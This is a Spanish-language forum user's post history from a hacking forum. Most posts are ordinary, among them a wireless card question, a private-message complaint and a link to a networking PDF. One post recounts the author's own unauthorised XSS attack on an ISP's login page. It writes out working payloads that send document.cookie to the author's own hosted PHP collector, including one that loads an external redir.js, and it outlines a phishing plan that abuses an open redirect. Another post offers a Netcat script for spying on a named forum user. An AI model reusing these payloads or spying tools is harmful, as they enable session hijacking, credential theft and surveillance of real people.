Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - toxeek

#1
Bueno pues ahora un script en Bash para el Abril Negro.

El script esta programado en Bash (Linux), y requiere que tengas instalado Netcat.

Lo que hace es mostrarte por pantalla (terminal) lo que hace cierto usuario del foro, refrescando cada 6 segundos. Para ejecutarlo, por ejemplo:

# ./spy "^Tifa^"


Lo he puesto entrecomillado el user, asi que es lo mejor que podeis hacer.


Bueno aqui pongo diferentes links de descarga:

@ easy-share:  http://www.easy-share.com/1909981552/spy.tar.gz

@ uploading:  http://uploading.com/files/54947dae/spy.tar.gz/

@ mediafire:  http://www.mediafire.com/?zdk2mkthnm2


 /*** MOD ***/

Ah, se me olvidaba deciros que para que podais ver lo que estan haciendo, el usuario a espiar debe de tener configurada la cuenta para aparecer como "visible", y asimismo por supuesto el user debe de estar conectado  ;D

 /*** MOD ***/

Actualizados links para hacer limpieza de archivos temporales creados por spy


  /*** MODD ***/

Bueno en realidad no hacia falta, ya hacia limpieza con trap, y desde que ejecuto en un loop infinito, pues habra que presionar Ctrl-C y esa es una de las se*ales que atrapo con trap!
Pero queda asi :)
#2
Bueno aqui va mi AuTo-MaTic version 0.2 Beta  ;D

Lean: https://foro.elhacker.net/analisis_y_diseno_de_malware/abril_negro_2010-t289363.0.html;msg1432360#msg1432360

Corre bajo Linux, uso Bash, Perl (leer README!), y C.

Para la  parte de "0ver the Net" requiere OpenVAS instalado..
Es indispensable leer el README, ya que debeis de tener instalados los modulos necesarios para Perl...

Bueno a ver si asi se animan mas WHK y tal !


Saludos.

P.S: para bugs (leed el README!) escribidme a avernopolis at gmail dot com. No tengo mucho tiempo pero hare lo posible.

#################################################################################
                   LINKS DE DESCARGA
#################################################################################

@x

@ x
@ x


Es para ejecutarlo cuando os vayais de casa por un rato :)



Enjoy y no pretendo ganar nada, solo aportar algo a este Abril Negro tan soso; venga animaos !
#3
Materiales y equipos / Que tarjeta ?
7 Septiembre 2009, 22:32 PM
Que tal?


Bueno, llevo un tiempo queriendo comprarme una tarjeta Wireless con antena, ya sea usb o pcmcia.

Estuve leyendo sobre cual seria mejor, las omni o las uni y decidi que las uni puesto que evitan ruido y tienen un mayor alcance.
Ahora, he estado leyendo y viendo como la gente se decanta por una Omnidireccional finalmente. Imagino que es para abarcar varias WLANs com mas certeza.

Ahora tambien he estado leyendo que las zydas suelen dar buenos resultados.

Partiendo de que la quiero para mi laptop ( usb seria fenomenal! ) y que quiero una BUENA tarjeta con soporte para Linux e inyeccion de tráfico y demás menesteres para auditoria wireless, cual seria una BUENA con un buen chipset para todo esto??


Saludos y Gracias!
#4
Nivel Web / Ayuda XSS?
10 Junio 2009, 15:54 PM
Que tal amigos del Hacking Web?!

Bueno, pues resulta que antes de ayer cai en una vulnerabilidad tipo XSS en la pagina de una ISP.

Bien, yo ESTABA LOGUED OUT, y se me ocurrio poner algo como
..vari="><script>alert();</script>

Bien, se ejecuto con ese sencillisimo XSS. Ahi pense .. pero que **** de filtros tiene, no?
Pues nada, me creo un dominio en un Hosting gratuito PHP.
Ahi pues pongo uno de los tipicos scripts en php para robar cookies y para que cree el archivo de texto. Le doy los permisos necesarios y me dirijo de nuevo a la web del ISP..

...vari="><script>document.location='http://myfirst_hosting/mystuff/pred.php?x=' +escape(document.cookie);</script>

Bien, pues nada. Se ve que para mandar por GET si filtraban algo, LOGUED OUT.

Pues hago lo segundo ( creo ! ) que se suele hacer en estos casos para saltar esto. O sea, me creo otro hosting gratuito y ahi pongo mi script en javascript: ( redir.js ):

location.href = 'http://myfirst_hosting.com/mystuff/pred.php?x=' +escape(document.cookie);

Ahora, en la ISP:

...vari="><script src='http://mysecond_hosting/mystuff/redir.js'>

Ahora SI comienzo a recibir las cookies en el archivo de texto que crea el script en php.
El caso es que TODO esto lo hice logued out, asi que las cookies de sesion no las mandaba.
Ahora .. que rayos estaba haciendo?? Tenia que loguearme e intentarlo logueado no??

Pues bien, el caso es que el XSS esta en la pagina de loguin. Una vez que me logueo, si me mando un mail ( por ejemplo ) a mi Inbox ( soy user ) de la ISP y pincho sobre est ( con el <script src > ) ya no funciona.

Se me ocurrio la tonteria de hacer un hipervinculo con el link que te desloguea y despues, en una variable dentro de el link de redireccion de log out redirecciono a la pagina de login con la variable vulnerable pero.. da igual! ya estoy logued off de nuevo y las cookies de sesion ya no se encuentran.

Entonces no habia mas remedio que buscar, una vez logueado, un variable por GET facilona y que me resultara en un XSS. Bien, la encontre pero.. pero los filtros son bien ****.

O sea, los filtros parecen estar ON cuando estoy logueado y
los filtros paracen estar OFF cuando estoy deslogueado..

Pues esa variable via GET, si le introducia pues de nuevo
...vari="><script>aler(213);</script>
no sanizaba ningun metacaracter, por lo cual se producia el alert.

Ahora, de ahi a que pudiera ejecutar otra cosa ( jugar con el DOM para mandarme las cookies, con img src, script src... nada .. ) nada de nada.

He probado mil tipos de saltos de filtros, incluyendo todos los de RSnake!

Esta page tiene intentos de saltos de filtrado curiosos:

http://www.xssing.com/index.php?x=1

Pero nada, encodeando y siempre teniendo en cuenta la posible entrada con ' "><.. ' nada.

Quisiera tomar consejo de los mas experimentados en estos casos y que me dijeran que puede estar ocurriendo ( ya que logued out si, logued on no ) y si hay algun modo de encontrar info que me lo aclare.


Muchas Gracias por vuestra atencion,

averno.


P.D: Suerte.


  /**** MODIFIKO ****/

Y.. no creo que tenga nada que ver con el same domain policy de javascript, ya que no es el caso.

  /**** MODIFIKO2 ****/

Ah... y si Admin/CoAdmins tienen mi IP, pues ya sabran de que page/ISP se trata  ;-)

ya siendo un XSS reflejado no tendria por que haber problemas con restricciones de cross-domain policies..

  /**** MODIFIKO3 ****/

Ah, y si es "vulnerable" ( he rozado uno ) a XSRFs, y he pensado alguno que otro. O sea, con la pagina de logout hay una variable "dest" que redirecciona a la pagina que yo quiera ( solo con presionar un link ). Por ello, un mail y phishing estan al alcance proximo ( que no voy ni a empezar a hacerlo ). /* Ya se, no es estrictamente XSRF */

Si le pones en la redireccion una page igual a la de la ISP, y con un "por favor, loguea de nuevo para no perder sesion" o algo asi, poca gente se detendra en que en la URL ha cambiado solo una letra, por ejemplo.
Pero, es que suena tan mal..

Y.. creo que HttpOnly en las cookies no esta definido. Es la impresion que tengo tras haber revisado/sniffado las cookies.... Asi que ( document.cookie ) iria bien aqui..

/* Nota:
Y que pasa con Firefox 3.0.10 .. por que no soporta HttpOnly cookies?? */

http://www.owasp.org/index.php/HTTPOnly

  /**** MODIFIKO4 ****/

Y no me suelo dedicar a estas cosas! Solo de vez en cuando que me aburro y prueba cosas via Web. Todo no va a ser leer, no. Hay q hacer el tonto a veces.
#5

Que tal.

Siento estar escribiendo esto en el abierto, pero me encuentro incapacitado para
comunicarme por privado.
El caso es que tengo la bandeja de entrada/salida sin ningun mensaje, o sea
limpia; al haber yo limpiado las mismas.
Lo que ocurre es que incluso asi, cuando intento mandar un privado obtengo un
mensaje que me dice que no puedo enviar mas mensajes privados porke he excedido
el limite.

Me temo, que ha sido algun truco administrativo. Si es asi, me gustaria saber el por
que. Si el motivo es de otra indole ( no truco administrativo ) me gustaria saber
como repararlo.

Perdonen las molestias: averno.

Saludos.
#6
Tutoriales - Documentación / Networking over Linux
9 Septiembre 2006, 01:16 AM
  que tal. Pues aki les dejo otro link que dirije a un pdf muy
interesante sobre hacks en Redes.

      Espero lo disfruten, los que sepan ingles claro.

  http://www.nostarch.com/download/hacking_ch3.pdf#search=%22hacking%20routers%20filetype%3Apdf%22


  Saludos.